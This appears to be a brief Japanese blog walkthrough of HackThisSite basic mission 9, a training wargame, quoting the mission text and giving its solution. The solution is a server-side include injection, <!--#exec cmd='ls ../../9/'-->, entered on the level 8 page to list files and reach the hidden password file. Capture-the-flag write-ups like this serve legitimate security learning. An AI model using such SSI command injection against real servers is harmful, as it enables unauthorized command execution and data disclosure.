問題

Network Security
Sam is going down with the ship - he's determined to keep obscuring the password file, no matter how many times people manage to recover it. This time the file is saved in /var/www/hackthissite.org/html/missions/basic/9/.

In the last level, however, in my attempt to limit people to using server side
includes to display the directory listing to level 8 only, I have mistakenly screwed up somewhere.. there is a way to get the obscured level 9 password. See if you can figure out how...

This level seems a lot trickier then it actually is, and it helps to have an understanding of how the script validates the user's input. The script finds the first occurance of '<--', and looks to see what follows directly after it. 

level8と同じようにできるよ的な。

攻略

なのでlevel8と同じことやるだけ。

level8のページに戻って、

<!--#exec cmd="ls ../../9/"-->

で、ファイルが見えるから以下同様に、
index.php以外のファイルにアクセスすればおk